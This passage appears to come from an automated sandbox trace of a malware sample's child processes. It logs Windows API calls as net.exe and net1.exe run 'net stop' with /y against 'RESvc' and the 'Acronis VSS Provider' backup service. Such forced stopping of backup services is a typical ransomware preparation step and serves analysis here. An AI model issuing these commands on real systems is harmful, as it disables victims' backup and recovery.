(normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0218.018] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x0, Size=0x5e) returned 0x323bf0 [0218.018] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0218.019] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2efd40 | out: Buffer=0x2efd40*=0x321c50) returned 0x0 [0218.019] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2efd40 | out: Buffer=0x2efd40*=0x321c68) returned 0x0 [0218.019] _fileno (_File=0x74eb2900) returned -2 [0218.019] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0218.019] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0218.019] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0218.019] _wcsicmp (_String1="config", _String2="stop") returned -16 [0218.019] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0218.019] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0218.019] _wcsicmp (_String1="file", _String2="stop") returned -13 [0218.019] _wcsicmp (_String1="files", _String2="stop") returned -13 [0218.019] _wcsicmp (_String1="group", _String2="stop") returned -12 [0218.019] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0218.019] _wcsicmp (_String1="help", _String2="stop") returned -11 [0218.019] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0218.019] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0218.019] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0218.019] _wcsicmp (_String1="session", _String2="stop") returned -15 [0218.019] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0218.019] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0218.019] _wcsicmp (_String1="share", _String2="stop") returned -12 [0218.019] _wcsicmp (_String1="start", _String2="stop") returned -14 [0218.019] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0218.019] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0218.019] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0218.019] _wcsicmp (_String1="accounts", _String2="RESvc") returned -17 [0218.019] _wcsicmp (_String1="computer", _String2="RESvc") returned -15 [0218.019] _wcsicmp (_String1="config", _String2="RESvc") returned -15 [0218.020] _wcsicmp (_String1="continue", _String2="RESvc") returned -15 [0218.020] _wcsicmp (_String1="cont", _String2="RESvc") returned -15 [0218.020] _wcsicmp (_String1="file", _String2="RESvc") returned -12 [0218.020] _wcsicmp (_String1="files", _String2="RESvc") returned -12 [0218.020] _wcsicmp (_String1="group", _String2="RESvc") returned -11 [0218.020] _wcsicmp (_String1="groups", _String2="RESvc") returned -11 [0218.020] _wcsicmp (_String1="help", _String2="RESvc") returned -10 [0218.020] _wcsicmp (_String1="helpmsg", _String2="RESvc") returned -10 [0218.020] _wcsicmp (_String1="localgroup", _String2="RESvc") returned -6 [0218.020] _wcsicmp (_String1="pause", _String2="RESvc") returned -2 [0218.020] _wcsicmp (_String1="session", _String2="RESvc") returned 1 [0218.020] _wcsicmp (_String1="sessions", _String2="RESvc") returned 1 [0218.020] _wcsicmp (_String1="sess", _String2="RESvc") returned 1 [0218.020] _wcsicmp (_String1="share", _String2="RESvc") returned 1 [0218.020] _wcsicmp (_String1="start", _String2="RESvc") returned 1 [0218.020] _wcsicmp (_String1="stats", _String2="RESvc") returned 1 [0218.020] _wcsicmp (_String1="statistics", _String2="RESvc") returned 1 [0218.020] _wcsicmp (_String1="stop", _String2="RESvc") returned 1 [0218.020] _wcsicmp (_String1="time", _String2="RESvc") returned 2 [0218.020] _wcsicmp (_String1="user", _String2="RESvc") returned 3 [0218.020] _wcsicmp (_String1="users", _String2="RESvc") returned 3 [0218.020] _wcsicmp (_String1="msg", _String2="RESvc") returned -5 [0218.020] _wcsicmp (_String1="messenger", _String2="RESvc") returned -5 [0218.020] _wcsicmp (_String1="receiver", _String2="RESvc") returned -16 [0218.020] _wcsicmp (_String1="rcv", _String2="RESvc") returned -2 [0218.020] _wcsicmp (_String1="netpopup", _String2="RESvc") returned -4 [0218.020] _wcsicmp (_String1="redirector", _String2="RESvc") returned -15 [0218.020] _wcsicmp (_String1="redir", _String2="RESvc") returned -15 [0218.020] _wcsicmp (_String1="rdr", _String2="RESvc") returned -1 [0218.020] _wcsicmp (_String1="workstation", _String2="RESvc") returned 5 [0218.020] _wcsicmp (_String1="work", _String2="RESvc") returned 5 [0218.020] _wcsicmp (_String1="wksta", _String2="RESvc") returned 5 [0218.020] _wcsicmp (_String1="prdr", _String2="RESvc") returned -2 [0218.020] _wcsicmp (_String1="devrdr", _String2="RESvc") returned -14 [0218.020] _wcsicmp (_String1="lanmanworkstation", _String2="RESvc") returned -6 [0218.020] _wcsicmp (_String1="server", _String2="RESvc") returned 1 [0218.020] _wcsicmp (_String1="svr", _String2="RESvc") returned 1 [0218.020] _wcsicmp (_String1="srv", _String2="RESvc") returned 1 [0218.021] _wcsicmp (_String1="lanmanserver", _String2="RESvc") returned -6 [0218.021] _wcsicmp (_String1="alerter", _String2="RESvc") returned -17 [0218.021] _wcsicmp (_String1="netlogon", _String2="RESvc") returned -4 [0218.021] _wcsupr (in: _String="RESvc" | out: _String="RESVC") returned="RESVC" [0218.021] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3254a0 [0218.023] GetServiceKeyNameW (in: hSCManager=0x3254a0, lpDisplayName="RESVC", lpServiceName=0x5aaaf0, lpcchBuffer=0x2efcdc | out: lpServiceName="", lpcchBuffer=0x2efcdc) returned 0 [0218.024] _wcsicmp (_String1="msg", _String2="RESVC") returned -5 [0218.024] _wcsicmp (_String1="messenger", _String2="RESVC") returned -5 [0218.024] _wcsicmp (_String1="receiver", _String2="RESVC") returned -16 [0218.024] _wcsicmp (_String1="rcv", _String2="RESVC") returned -2 [0218.024] _wcsicmp (_String1="redirector", _String2="RESVC") returned -15 [0218.024] _wcsicmp (_String1="redir", _String2="RESVC") returned -15 [0218.024] _wcsicmp (_String1="rdr", _String2="RESVC") returned -1 [0218.024] _wcsicmp (_String1="workstation", _String2="RESVC") returned 5 [0218.024] _wcsicmp (_String1="work", _String2="RESVC") returned 5 [0218.024] _wcsicmp (_String1="wksta", _String2="RESVC") returned 5 [0218.024] _wcsicmp (_String1="prdr", _String2="RESVC") returned -2 [0218.024] _wcsicmp (_String1="devrdr", _String2="RESVC") returned -14 [0218.024] _wcsicmp (_String1="lanmanworkstation", _String2="RESVC") returned -6 [0218.024] _wcsicmp (_String1="server", _String2="RESVC") returned 1 [0218.024] _wcsicmp (_String1="svr", _String2="RESVC") returned 1 [0218.024] _wcsicmp (_String1="srv", _String2="RESVC") returned 1 [0218.024] _wcsicmp (_String1="lanmanserver", _String2="RESVC") returned -6 [0218.024] _wcsicmp (_String1="alerter", _String2="RESVC") returned -17 [0218.024] _wcsicmp (_String1="netlogon", _String2="RESVC") returned -4 [0218.024] NetServiceControl (in: servername=0x0, service="RESVC", opcode=0x0, arg=0x0, bufptr=0x2efcd8 | out: bufptr=0x2efcd8) returned 0x889 [0218.025] wcscpy_s (in: _Destination=0x5aa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0218.025] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0218.026] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x5ab338, nSize=0x800, Arguments=0x5a9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0218.027] GetFileType (hFile=0x26c) returned 0x3 [0218.027] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x323fd0 [0218.027] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x323fd0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0218.027] WriteFile (in: hFile=0x26c, lpBuffer=0x323fd0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2efc18, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2efc18, lpOverlapped=0x0) returned 0 [0218.027] LocalFree (hMem=0x323fd0) returned 0x0 [0218.027] GetFileType (hFile=0x26c) returned 0x3 [0218.027] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x326278 [0218.027] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x326278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n2", lpUsedDefaultChar=0x0) returned 2 [0218.027] WriteFile (in: hFile=0x26c, lpBuffer=0x326278, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2efc18, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2efc18, lpOverlapped=0x0) returned 0 [0218.027] LocalFree (hMem=0x326278) returned 0x0 [0218.027] _ultow (in: _Dest=0x889, _Radix=3079240 | out: _Dest=0x889) returned="2185" [0218.027] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x5ab338, nSize=0x800, Arguments=0x5a9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0218.028] GetFileType (hFile=0x26c) returned 0x3 [0218.028] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x326278 [0218.028] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x326278, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0218.028] WriteFile (in: hFile=0x26c, lpBuffer=0x326278, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2efc24, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2efc24, lpOverlapped=0x0) returned 0 [0218.028] LocalFree (hMem=0x326278) returned 0x0 [0218.028] GetFileType (hFile=0x26c) returned 0x3 [0218.028] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x326278 [0218.028] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x326278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n2", lpUsedDefaultChar=0x0) returned 2 [0218.028] WriteFile (in: hFile=0x26c, lpBuffer=0x326278, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2efc24, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2efc24, lpOverlapped=0x0) returned 0 [0218.028] LocalFree (hMem=0x326278) returned 0x0 [0218.028] NetApiBufferFree (Buffer=0x321c50) returned 0x0 [0218.029] NetApiBufferFree (Buffer=0x321c68) returned 0x0 [0218.029] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop RESvc /y" [0218.029] exit (_Code=2) Process: id = "374" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5326b000" os_pid = "0x204" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£Acronis VSS ProviderΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 549 os_tid = 0x5a4 Process: id = "375" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5d636000" os_pid = "0x5e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "374" os_parent_pid = "0x204" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£Acronis VSS ProviderΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 550 os_tid = 0x6f4 [0218.162] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfc9c | out: lpSystemTimeAsFileTime=0x2cfc9c*(dwLowDateTime=0x4b394620, dwHighDateTime=0x1d57a87)) [0218.162] GetCurrentProcessId () returned 0x5e4 [0218.162] GetCurrentThreadId () returned 0x6f4 [0218.162] GetTickCount () returned 0x1170149 [0218.162] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfc94 | out: lpPerformanceCount=0x2cfc94*=33844653853) returned 1 [0218.162] GetModuleHandleA (lpModuleName=0x0) returned 0x220000 [0218.162] __set_app_type (_Type=0x1) [0218.162] __p__fmode () returned 0x74eb31f4 [0218.162] __p__commode () returned 0x74eb31fc [0218.162] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x22ffe6) returned 0x0 [0218.163] __getmainargs (in: _Argc=0x239064, _Argv=0x23906c, _Env=0x239068, _DoWildCard=0, _StartInfo=0x239024 | out: _Argc=0x239064, _Argv=0x23906c, _Env=0x239068) returned 0 [0218.163] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0218.163] GetConsoleOutputCP () returned 0x1b5 [0218.163] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x239080 | out: lpCPInfo=0x239080) returned 1 [0218.163] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.166] sprintf_s (in: _DstBuf=0x2cfc54, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0218.166] setlocale (category=0, locale=".437") returned="English_United States.437" [0218.168] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0218.168] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0218.168] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Acronis VSS ProviderΓÇ¥ /y" [0218.168] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cfa20, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0218.169] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x90) returned 0x584c00 [0218.169] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0218.169] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2cfc24 | out: Buffer=0x2cfc24*=0x581c98) returned 0x0 [0218.169] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2cfc24 | out: Buffer=0x2cfc24*=0x581cb0) returned 0x0 [0218.169] _fileno (_File=0x74eb2900) returned -2 [0218.169] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0218.169] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0218.169] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0218.169] _wcsicmp (_String1="config", _String2="stop") returned -16 [0218.169] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0218.169] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0218.169] _wcsicmp (_String1="file", _String2="stop") returned -13 [0218.169] _wcsicmp (_String1="files", _String2="stop") returned -13 [0218.169] _wcsicmp (_String1="group", _String2="stop") returned -12 [0218.169] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0218.169] _wcsicmp (_String1="help", _String2="stop") returned -11 [0218.169] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0218.169] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0218.169] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0218.170] _wcsicmp (_String1="session", _String2="stop") returned -15 [0218.170] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0218.170] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0218.170] _wcsicmp (_String1="share", _String2="stop") returned -12 [0218.170] _wcsicmp (_String1="start", _String2="stop") returned -14 [0218.170] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0218.170] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0218.170] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0218.170] _wcsicmp (_String1="accounts", _String2="ΓÇ£Acronis") returned -850 [0218.170] _wcsicmp (_String1="computer", _String2="ΓÇ£Acronis") returned -848 [0218.170] _wcsicmp (_String1="config", _String2="ΓÇ£Acronis") returned -848 [0218.170] _wcsicmp (_String1="continue", _String2="ΓÇ£Acronis") returned -848 [0218.170] _wcsicmp (_String1="cont", _String2="ΓÇ£Acronis") returned -848 [0218.170] _wcsicmp (_String1="file", _String2="ΓÇ£Acronis") returned -845 [0218.170] _wcsicmp (_String1="files", _String2="ΓÇ£Acronis") returned -845 [0218.170] _wcsicmp (_String1="group", _String2="ΓÇ£Acronis") returned -844 [0218.171] _wcsicmp (_String1="groups", _String2="ΓÇ£Acronis") returned -844 [0218.171] _wcsicmp (_String1="help", _String2="ΓÇ£Acronis") returned -843 [0218.171] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£Acronis") returned -843 [0218.171] _wcsicmp (_String1="localgroup", _String2="ΓÇ£Acronis") returned -839 [0218.171] _wcsicmp (_String1="pause", _String2="ΓÇ£Acronis") returned -835 [0218.171] _wcsicmp (_String1="session", _String2="ΓÇ£Acronis") returned -832 [0218.171] _wcsicmp (_String1="sessions", _String2="ΓÇ£Acronis") returned -832 [0218.171] _wcsicmp (_String1="sess", _String2="ΓÇ£Acronis") returned -832 [0218.171] _wcsicmp (_String1="share", _String2="ΓÇ£Acronis") returned -832 [0218.171] _wcsicmp (_String1="start", _String2="ΓÇ£Acronis") returned -832 [0218.171] _wcsicmp (_String1="stats", _String2="ΓÇ£Acronis") returned -832 [0218.171] _wcsicmp (_String1="statistics", _String2="ΓÇ£Acronis") returned -832 [0218.171] _wcsicmp (_String1="stop", _String2="ΓÇ£Acronis") returned -832 [0218.171] _wcsicmp (_String1="time", _String2="ΓÇ£Acronis") returned -831 [0218.171] _wcsicmp (_String1="user", _String2="ΓÇ£Acronis") returned -830 [0218.171] _wcsicmp (_String1="users", _String2="ΓÇ£Acronis") returned -830 [0218.171] _wcsicmp (_String1="msg", _String2="ΓÇ£Acronis") returned -838 [0218.171] _wcsicmp (_String1="messenger", _String2="ΓÇ£Acronis") returned -838 [0218.171] _wcsicmp (_String1="receiver", _String2="ΓÇ£Acronis") returned -833 [0218.171] _wcsicmp (_String1="rcv", _String2="ΓÇ£Acronis") returned -833 [0218.171] _wcsicmp (_String1="netpopup", _String2="ΓÇ£Acronis") returned -837 [0218.171] _wcsicmp (_String1="redirector", _String2="ΓÇ£Acronis") returned -833 [0218.171] _wcsicmp (_String1="redir", _String2="ΓÇ£Acronis") returned -833 [0218.171] _wcsicmp (_String1="rdr", _String2="ΓÇ£Acronis") returned -833 [0218.171] _wcsicmp (_String1="workstation", _String2="ΓÇ£Acronis") returned -828 [0218.171] _wcsicmp (_String1="work", _String2="ΓÇ£Acronis") returned -828 [0218.171] _wcsicmp (_String1="wksta", _String2="ΓÇ£Acronis") returned -828 [0218.171] _wcsicmp (_String1="prdr", _String2="ΓÇ£Acronis") returned -835 [0218.171] _wcsicmp (_String1="devrdr", _String2="ΓÇ£Acronis") returned -847 [0218.171] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£Acronis") returned -839 [0218.171] _wcsicmp (_String1="server", _String2="ΓÇ£Acronis") returned -832 [0218.171] _wcsicmp (_String1="svr", _String2="ΓÇ£Acronis") returned -832 [0218.171] _wcsicmp (_String1="srv", _String2="ΓÇ£Acronis") returned -832 [0218.171] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£Acronis") returned -839 [0218.171] _wcsicmp (_String1="alerter", _String2="ΓÇ£Acronis") returned -850 [0218.171] _wcsicmp (_String1="netlogon", _String2="ΓÇ£Acronis") returned -837 [0218.172] _wcsicmp (_String1="accounts", _String2="VSS") returned -21 [0218.172] _wcsicmp (_String1="computer", _String2="VSS") returned -19 [0218.172] _wcsicmp (_String1="config", _String2="VSS") returned -19 [0218.172] _wcsicmp (_String1="continue", _String2="VSS") returned -19 [0218.172] _wcsicmp (_String1="cont", _String2="VSS") returned -19 [0218.172] _wcsicmp (_String1="file", _String2="VSS") returned -16 [0218.172] _wcsicmp (_String1="files", _String2="VSS") returned -16 [0218.172] _wcsicmp (_String1="group", _String2="VSS") returned -15 [0218.172] _wcsicmp (_String1="groups", _String2="VSS") returned -15 [0218.172] _wcsicmp (_String1="help", _String2="VSS") returned -14 [0218.172] _wcsicmp (_String1="helpmsg", _String2="VSS") returned -14 [0218.172] _wcsicmp (_String1="localgroup", _String2="VSS") returned -10 [0218.172] _wcsicmp (_String1="pause", _String2="VSS") returned -6 [0218.172] _wcsicmp (_String1="session", _String2="VSS") returned -3 [0218.172] _wcsicmp (_String1="sessions", _String2="VSS") returned -3 [0218.172] _wcsicmp (_String1="sess", _String2="VSS") returned -3 [0218.172] _wcsicmp (_String1="share", _String2="VSS") returned -3 [0218.172] _wcsicmp (_String1="start", _String2="VSS") returned -3 [0218.172] _wcsicmp (_String1="stats", _String2="VSS") returned -3 [0218.172] _wcsicmp (_String1="statistics", _String2="VSS") returned -3 [0218.172] _wcsicmp (_String1="stop", _String2="VSS") returned -3 [0218.172] _wcsicmp (_String1="time", _String2="VSS") returned -2 [0218.172] _wcsicmp (_String1="user", _String2="VSS") returned -1 [0218.172] _wcsicmp (_String1="users", _String2="VSS") returned -1 [0218.172] _wcsicmp (_String1="msg", _String2="VSS") returned -9 [0218.172] _wcsicmp (_String1="messenger", _String2="VSS") returned -9 [0218.172] _wcsicmp (_String1="receiver", _String2="VSS") returned -4 [0218.172] _wcsicmp (_String1="rcv", _String2="VSS") returned -4 [0218.172] _wcsicmp (_String1="netpopup", _String2="VSS") returned -8 [0218.172] _wcsicmp (_String1="redirector", _String2="VSS") returned -4 [0218.172] _wcsicmp (_String1="redir", _String2="VSS") returned -4 [0218.172] _wcsicmp (_String1="rdr", _String2="VSS") returned -4 [0218.172] _wcsicmp (_String1="workstation", _String2="VSS") returned 1 [0218.172] _wcsicmp (_String1="work", _String2="VSS") returned 1 [0218.173] _wcsicmp (_String1="wksta", _String2="VSS") returned 1 [0218.173] _wcsicmp (_String1="prdr", _String2="VSS") returned -6 [0218.173] _wcsicmp (_String1="devrdr", _String2="VSS") returned -18 [0218.173] _wcsicmp (_String1="lanmanworkstation", _String2="VSS") returned -10 [0218.173] _wcsicmp (_String1="server", _String2="VSS") returned -3 [0218.173] _wcsicmp (_String1="svr", _String2="VSS") returned -3 [0218.173] _wcsicmp (_String1="srv", _String2="VSS") returned -3 [0218.173] _wcsicmp (_String1="lanmanserver", _String2="VSS") returned -10 [0218.173] _wcsicmp (_String1="alerter", _String2="VSS") returned -21 [0218.173] _wcsicmp (_String1="netlogon", _String2="VSS") returned -8 [0218.173] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0218.173] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.173] wcscpy_s (in: _Destination=0x2cf724, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0218.173] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74a00000 [0218.174] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x2cf720, nSize=0x0, Arguments=0x2cf71c | out: lpBuffer="叠Xneth.dll") returned 0xff [0218.175] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0218.175] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0218.175] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0218.175] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0218.175] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0218.175] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0218.175] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0218.175] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0218.176] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0218.176] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0218.176] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.176] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0218.176] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0218.176] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0218.176] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0218.176] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0218.176] _wcsicmp (_String1="CONT", _String2="ΓÇ£Acronis") returned -848 [0218.176] _wcsicmp (_String1="CONT", _String2="VSS") returned -19 [0218.176] _wcsicmp (_String1="CONT", _String2="ProviderΓÇ¥") returned -13 [0218.176] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.176] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0218.176] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.176] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0218.176] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0218.176] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0218.176] _wcsicmp (_String1="FILES", _String2="ΓÇ£Acronis") returned -845 [0218.176] _wcsicmp (_String1="FILES", _String2="VSS") returned -16 [0218.176] _wcsicmp (_String1="FILES", _String2="ProviderΓÇ¥") returned -10 [0218.176] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.176] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0218.176] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.176] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0218.176] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0218.176] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0218.176] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£Acronis") returned -844 [0218.176] _wcsicmp (_String1="GROUPS", _String2="VSS") returned -15 [0218.176] _wcsicmp (_String1="GROUPS", _String2="ProviderΓÇ¥") returned -9 [0218.176] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.176] wcstok (in: _String="\r\nREPLICATOR: REPL, 